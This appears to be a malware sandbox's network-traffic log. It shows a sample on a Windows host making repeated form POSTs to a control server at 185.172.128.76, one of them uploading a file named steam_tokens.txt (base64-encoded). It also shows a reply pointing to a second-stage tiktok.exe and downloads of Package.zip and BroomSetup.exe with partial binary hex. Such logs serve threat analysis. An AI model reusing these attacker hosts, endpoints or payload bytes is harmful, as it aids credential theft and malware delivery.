Apr 27, 2024 00:46:56.119554996 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 22:46:56 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 00:46:56.170996904 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIIEGHJJDGHCAKEBGIJK Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 00:46:56.477644920 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 22:46:56 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 00:46:56.766530991 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIJDAFBKFIECBGCAKECG Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 00:46:57.066653967 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 22:46:56 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 00:46:57.073983908 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCGIJDBAFCBAAKECGDGC Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 00:46:57.378031015 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 22:46:57 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 00:46:57.385004044 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHDHDHIECGCAEBFIIDHI Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 00:46:57.691669941 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 22:46:57 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 00:46:57.854329109 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDBGHDHCGHCAAKEBKECB Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 00:46:58.159020901 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 22:46:58 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 00:46:58.165008068 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHDAAKJEGCFCAKEBKJJE Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 00:46:58.478096962 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 22:46:58 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 00:46:58.522516966 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKJEBAAECBGDHIECAKJK Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 00:46:58.826663017 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 22:46:58 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 00:46:58.844373941 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFCAAEGDBKJJKECBKFHC Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 00:46:59.149873018 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 22:46:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 00:47:00.385966063 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHDHDHIECGCAEBFIIDHI Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 00:47:00.695930958 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 22:47:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 00:47:00.700757980 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGDBFBGIDHCAAKEBAKFI Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 00:47:01.001498938 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 22:47:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 00:47:01.438081980 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDBFCGIIIJDBGCBGIDGI Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 00:47:01.744118929 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 22:47:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 00:47:01.749640942 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIEBAKEHDHCAKEBFBKEG Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 00:47:02.058845043 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 22:47:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 00:47:02.089741945 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCGIJDBAFCBAAKECGDGC Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 00:47:02.393865108 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 22:47:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 00:47:02.438987970 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEHJJECBKKECFIEBGCAK Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 00:47:02.742870092 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 22:47:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 00:47:02.750289917 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAFHIDGIJKJKECBGDBGH Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 00:47:03.055218935 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 22:47:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 00:47:03.074891090 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFBKFHIDHIIJJKECGHCF Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 00:47:03.388947010 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 22:47:03 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 00:47:03.394738913 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKJECBAAAFHIIEBFCBKF Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 00:47:03.707281113 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 22:47:03 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 00:47:06.218354940 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKEHIEBKJKFIEBGDGDAA Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 00:47:06.523571968 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 22:47:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 00:47:06.782949924 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBGCBGCAFIIECBFIDHIJ Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 00:47:07.091748953 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 22:47:07 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 00:47:07.231317043 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBGCBKFBGIIIECAAAKFC Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 00:47:07.538918018 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 22:47:07 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 00:47:07.818067074 CEST	564	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCFBFBAEBKJKEBGCAEHC Host: 185.172.128.76 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 43 46 42 46 42 41 45 42 4b 4a 4b 45 42 47 43 41 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 35 63 37 38 64 66 32 33 34 39 31 65 65 31 33 63 34 38 35 34 37 37 33 39 38 38 61 66 38 38 63 37 63 64 33 38 36 38 66 39 35 65 62 34 32 65 62 38 64 62 65 37 38 63 64 61 61 65 31 65 65 30 31 66 38 39 31 38 35 61 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 42 46 42 41 45 42 4b 4a 4b 45 42 47 43 41 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 42 46 42 41 45 42 4b 4a 4b 45 42 47 43 41 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------HCFBFBAEBKJKEBGCAEHCContent-Disposition: form-data; name="token"005c78df23491ee13c4854773988af88c7cd3868f95eb42eb8dbe78cdaae1ee01f89185a------HCFBFBAEBKJKEBGCAEHCContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------HCFBFBAEBKJKEBGCAEHCContent-Disposition: form-data; name="file"------HCFBFBAEBKJKEBGCAEHC--
Apr 27, 2024 00:47:08.125698090 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 22:47:08 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 00:47:10.059859991 CEST	204	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCBFBGCGIJKJJKFIDBFC Host: 185.172.128.76 Content-Length: 118931 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 00:47:11.377192020 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 22:47:11 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 00:47:11.413970947 CEST	469	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAKEBFCFIJJKKECAKJEH Host: 185.172.128.76 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 41 4b 45 42 46 43 46 49 4a 4a 4b 4b 45 43 41 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 35 63 37 38 64 66 32 33 34 39 31 65 65 31 33 63 34 38 35 34 37 37 33 39 38 38 61 66 38 38 63 37 63 64 33 38 36 38 66 39 35 65 62 34 32 65 62 38 64 62 65 37 38 63 64 61 61 65 31 65 65 30 31 66 38 39 31 38 35 61 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 45 42 46 43 46 49 4a 4a 4b 4b 45 43 41 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 68 65 72 37 68 34 38 72 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 45 42 46 43 46 49 4a 4a 4b 4b 45 43 41 4b 4a 45 48 2d 2d 0d 0a Data Ascii: ------CAKEBFCFIJJKKECAKJEHContent-Disposition: form-data; name="token"005c78df23491ee13c4854773988af88c7cd3868f95eb42eb8dbe78cdaae1ee01f89185a------CAKEBFCFIJJKKECAKJEHContent-Disposition: form-data; name="message"her7h48r------CAKEBFCFIJJKKECAKJEH--
Apr 27, 2024 00:47:11.723068953 CEST	223	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 22:47:11 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 52 Connection: keep-alive Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 34 4e 53 34 78 4e 7a 49 75 4d 54 49 34 4c 6a 49 77 4d 79 39 30 61 57 74 30 62 32 73 75 5a 58 68 6c 66 44 42 38 4d 48 78 38 Data Ascii: aHR0cDovLzE4NS4xNzIuMTI4LjIwMy90aWt0b2suZXhlfDB8MHx8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49734	176.97.76.106	80	6916	C:\Users\user\Desktop\kO1P1YnLst.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:46:05.010574102 CEST	185	OUT	GET /1/Package.zip HTTP/1.1 Host: note.padd.cn.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 27, 2024 00:46:05.206229925 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 22:30:44 GMT Content-Type: application/zip Content-Length: 3884863 Last-Modified: Wed, 24 Apr 2024 05:45:46 GMT Connection: keep-alive ETag: "66289c8a-3b473f" Strict-Transport-Security: max-age=31536000 Accept-Ranges: bytes Data Raw: 50 4b 03 04 14 00 00 00 08 00 0b 3f 98 58 ef da 8c 80 dd c7 12 00 09 49 14 00 09 00 00 00 62 75 6e 63 68 2e 64 61 74 5c 5d 87 a2 aa 3a 16 cd af 89 8a 20 22 2a 16 10 05 54 ec 15 1b fa f7 b3 d6 4e 3c 77 66 bc ef 58 20 24 3b bb 65 b7 e4 29 a5 ac 9e af 7c 75 5d 2b bc a6 ca 55 2a 56 ea a9 7e af 81 db 9b bd d4 66 da 52 6a 65 f7 f5 b5 1d fe 1a b5 40 f5 66 f8 72 c0 df 56 0d 95 da 17 4a 2d f0 23 55 bd e7 b3 b7 bc 2a b5 de ab 3d ba 54 13 f5 45 13 35 cc 94 5a fa e3 83 aa 26 b5 9e 7a cf 95 fa f4 27 18 6b a2 8e 25 9e cb 4a 65 a9 cb 85 03 dc d4 5b 35 1e e8 cd c6 8f f7 50 c5 db 85 42 7f b5 19 40 05 ac f3 07 2e bf d4 e9 96 a8 47 eb fc 7a 5b 2a 8f 2d 42 31 e2 c3 ce d0 4a 7a 23 0c a9 ce d7 25 de bb 4a b1 fb a6 6a 06 0f d5 57 f5 a4 0e 18 af b5 00 1d 3e 36 32 eb 6a 4b 28 95 bc 0d d4 f1 a3 1a a1 9a c4 a5 02 84 45 b4 54 c9 51 7d d6 6a dd 5f 49 8b 8e 52 ee 54 45 6a a3 3e d2 f1 8b 4f c6 2a 99 3a 4a 25 6f a5 da aa 18 02 8b ec aa a6 b2 60 82 66 2b 4f a9 d6 1c 57 3e 15 87 c0 a3 dd 53 8e 49 4e 43 f5 6d ab 36 be a9 7c 77 51 bb [TRUNCATED] Data Ascii: PK?XIbunch.dat\]: "TN<wfX $;e)\|u]+UV~fRje@frVJ-#U=TE5Z&z'k%Je[5PB@.Gz[-B1Jz#%JjW>62jK(ETQ}j_IRTEj>O:J%o`f+OW>SINCm6\|wQxkKoD:n4P>M_\|PR@gWkXMbMH #oCC!1!RgQc "PQ3HBF\|)@W6Z79d'`_6zr%a7,.l.hvPOf!Y#Y7gv=kJN#\5]<VGU~,Xok.#?v%0+m(mahJG>mVkbBjXV$p ?<^%KA=0\(Ql>;x#W@@tIU Q/e7Ew}h^N +bRz2rfu'os}1j{'%?ZM9.\|PWoc3H\4B;1465Q324$2(9j!$<<P#bLjDvG+}T6tRb"ofh>Z5(]
Apr 27, 2024 00:46:05.206273079 CEST	1289	IN	Data Raw: 9e eb 93 5a 97 53 4c ea 1d 6a 03 c2 62 55 39 25 62 42 ae d3 fa 42 88 fb 27 a8 43 b2 49 31 c3 44 5b ca ba aa 00 34 12 88 ca b9 5f 02 ba 75 fa 98 e6 aa 99 b6 d8 3a 3a ef 40 87 6c d7 24 a1 82 22 2e a6 95 3a 3b ba a7 69 a9 6a a6 7f 61 eb 16 d7 24 8a Data Ascii: ZSLjbU9%bBB'CI1D[4_u::@l$".:;ija$(i2_NXj&4Uh{"~2ReWhP<U0 ~pSM4G?wNx/OVcyb:kW!b'BF*s}f{'L)cz9A0`$zTN1
Apr 27, 2024 00:46:05.206351995 CEST	1289	IN	Data Raw: 91 e8 d4 4f 64 fd 25 3f c7 5c b6 02 a1 e3 62 97 c5 b4 36 30 5c 0f 0b a4 95 e2 4b f3 20 8b ae 74 0a d8 6f 64 c9 cd 0f 89 fb de 6f fc ee 08 20 10 e8 db 99 62 ec 25 9c 25 99 27 b2 b4 24 0c f1 b9 97 af 0f 68 ef 8d 2f cf 5f 68 0e ba fe 1c 0c ff 7d 3c Data Ascii: Od%?\b60\K todo b%%'$h/_h}<?\Z7V6]m!Nm(H\|Im8zn2jk)jPE/d\_r_"R:j4J\CsyuXx3tS9V;,.\|j\[S
Apr 27, 2024 00:46:05.206389904 CEST	1289	IN	Data Raw: 16 d3 e9 46 6e ba ef 9e 3e ac 87 cb 48 1b 8b 1b e2 6e 6b f7 dd 08 4c 39 c4 34 5e c7 86 4d 0e 9b cf 71 d7 69 4c 55 b7 78 9e 89 67 31 89 95 56 76 27 82 62 77 47 32 48 54 a5 75 d1 bb f3 1d 92 03 63 60 f8 fd e3 ff 91 d6 3d dd 13 b9 b9 73 37 31 97 f5 Data Ascii: Fn>HnkL94^MqiLUxg1Vv'bwG2HTuc`=s71(g{qT-#ulNjR:Om@,kfCgsl WEO1lj$z?kLUhPA8XvqbP~iwY2.y\W=1Wq0O}Rl
Apr 27, 2024 00:46:05.206532001 CEST	1289	IN	Data Raw: e1 8d 3e ea ea fb 97 aa 06 3c ad 0a 8f f7 90 2a ca 3a 58 17 34 2e 60 db f4 ce 19 bb 1b 3d d4 b1 15 8a 22 f2 ef 2b 50 21 c1 04 c8 60 9f ba 70 95 bc 1d 95 3b 4b 05 45 2e 89 7c 18 6c 94 7f c0 2f de 2f b4 4e 9c b6 90 6d 9c b4 d5 9d 0d c4 f0 bf c7 9a Data Ascii: ><:X4.`="+P!`p;KE.\|l//Nmnkk&z'74<RY>y=O+MDcSo@x 9c;>-{];@G\{?];[Peqpq=Iqa5`D_AP_GU3[_\|gYA#8
Apr 27, 2024 00:46:05.206624985 CEST	1289	IN	Data Raw: 03 fc cc 1a 92 a0 9d cc 8c 39 c4 b5 34 53 ef 8f ac 49 03 e5 36 a9 6a e7 87 3c e7 54 4e cb 6d 1f d6 0d 6f ed c9 9e e1 e6 ec 91 bf 6b 6a 91 3e cb f1 02 2a e9 eb ac d4 5f ba 11 a4 85 50 ae f5 fa 37 21 1c 57 76 b7 7d 21 ec 4b 32 0f 40 c9 12 33 1e 43 Data Ascii: 94SI6j<TNmokj>_P7!Wv}!K2@3Cs-<HIo5 Q0V?4v^i2D5v$ip^`RLK$.0 ^wS~W _h:JIEE;/?j8-
Apr 27, 2024 00:46:05.206662893 CEST	1289	IN	Data Raw: 23 92 12 a8 ed ec 3a 23 5c c7 33 cd bc 07 1c 47 cf e6 44 fb 2d e3 53 62 a2 58 17 50 1f ac 0c 92 e1 77 b6 56 b3 ba 3a 06 37 24 d5 e2 4d 74 20 4a 83 6e c1 29 9f 67 8b c1 47 5d a4 54 73 8e aa ea 13 c3 23 cc 3c 18 d3 39 ed 82 06 8b b6 ee 95 3b 16 f8 Data Ascii: #:#\3GD-SbXPwV:7$Mt Jn)gG]Ts#<9;1xr5:StLE8:ihFtT%X(]d-nS(W!(.vwpv.[E%AdOZguvYHGv:u\6sEaXu6;\.*
Apr 27, 2024 00:46:05.206736088 CEST	1289	IN	Data Raw: 26 77 2e 9f 11 1f dc c1 ba f5 4f a2 64 c7 94 86 7a 5b 8f bd 8a d0 3a 30 6e e3 7e 84 38 e6 10 7d 0d c4 e3 5d c7 eb b1 98 15 a5 59 c1 e0 e0 a1 be 3e 69 cf ba 61 6a 92 e0 3b 99 7f 83 14 9a 8b f3 12 5f 4b 28 4a 28 cd c3 63 81 59 6e ed d7 e1 53 53 4d Data Ascii: &w.Odz[:0n~8}]Y>iaj;_K(J(cYnSSM2UXf2&3mtvaj8;X!_/dlI8u1J/919FI41iD:5-^kq).ptGO4B?
Apr 27, 2024 00:46:05.206845045 CEST	1289	IN	Data Raw: 00 cc 0a 32 de db 68 03 5c d7 9a 0f ef b0 e7 c6 b2 54 5e 80 d7 df 8b ec ce 42 f0 54 5a fe fc 02 eb 50 7b b8 40 bb a5 87 16 e1 d3 25 f1 f3 d0 bf ac f8 7b 4a 2e d1 42 f0 9a cc 7c 6e fe 24 14 e7 3d ea fe 36 1b 69 9b 63 f8 63 36 25 8e 5a fd b3 78 eb Data Ascii: 2h\T^BTZP{@%{J.B\|n$=6icc6%Zxn1#]\|D;Scv\f-!jID\$[V=!k%cpOSvu'p.B1z3z+L:4Y7U'g`
Apr 27, 2024 00:46:05.206962109 CEST	1289	IN	Data Raw: 70 ec 91 9e 1a b6 f3 5f 25 dc f4 9b bb ac 07 63 42 0f 8f 1e 65 67 df 33 2d d4 fe c1 55 6c 20 fa 23 42 7c ce 66 ad 52 a3 fe 0a 1a 7e ae 37 c5 8c cc 51 67 6a f7 cd 70 5c d0 66 72 69 6f 08 57 5f 4e 81 f1 e9 c4 eb a2 a5 df f6 cc b5 e7 51 ae 56 b8 25 Data Ascii: p_%cBeg3-Ul #B\|fR~7Qgjp\frioW_NQV%#p&osj}(K^"ea/go6&v3\o{Mh3XqAOsrabEtU_P?a#sn9y3u@(T]hN5NPT#hM
Apr 27, 2024 00:46:05.403711081 CEST	1289	IN	Data Raw: db 4d 87 6f fe 6d d4 ff 76 19 6e e6 d5 95 f5 08 7f 96 68 9f cf a1 4b f3 42 8e 7e c5 60 5d fa 32 76 eb b8 3d e7 fe a6 b5 ef 88 7a 69 90 a1 07 6d 40 ca 4d ad 2f f1 0f 46 61 32 9a 7c 9c bf 64 11 6f b6 a4 1a b0 1d 9d 1d 76 3e e4 76 85 e0 ad ef 6b be Data Ascii: MomvnhKB~`]2v=zim@M/Fa2\|dov>vk3#qLj[G?&e<kl9SA/vS/DMLaNjF[3);<g2<pUyru{){N8gk{>\|=r2WRBL]+=K

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49735	185.172.128.228	80	6916	C:\Users\user\Desktop\kO1P1YnLst.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:46:10.155283928 CEST	185	OUT	GET /BroomSetup.exe HTTP/1.1 Host: 185.172.128.228 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 27, 2024 00:46:10.328267097 CEST	1289	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 22:46:10 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 15 Mar 2024 11:59:56 GMT ETag: "4a4030-613b1bf118700" Accept-Ranges: bytes Content-Length: 4866096 Content-Type: application/x-msdos-program Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 84 e1 90 58 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 c4 35 00 00 50 14 00 00 00 00 00 60 d5 35 00 00 10 00 00 00 e0 35 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 [TRUNCATED] Data Ascii: MZP@!L!This program must be run under Win32$7PELX5P`55@J`J@7N<J0(08 878.texth55 `.itext<=5>5 `.dataV5X5@.bssm@7 7.idataN7P 7@.didata8p7@.tls@8z7.rdata 8z7@@.reloc08\|7@B.rsrc<<@@JJ@@ [TRUNCATED]
Apr 27, 2024 00:46:10.328305006 CEST	1289	IN	Data Raw: 61 6e 01 00 00 00 00 01 00 00 00 00 10 40 00 05 46 61 6c 73 65 04 54 72 75 65 06 53 79 73 74 65 6d 02 00 00 00 34 10 40 00 02 08 41 6e 73 69 43 68 61 72 01 00 00 00 00 ff 00 00 00 02 00 00 00 00 50 10 40 00 09 04 43 68 61 72 03 00 00 00 00 ff ff Data Ascii: an@FalseTrueSystem4@AnsiCharP@Charh@ShortInt@SmallInt@Integer@Byte@Word@Pointer@
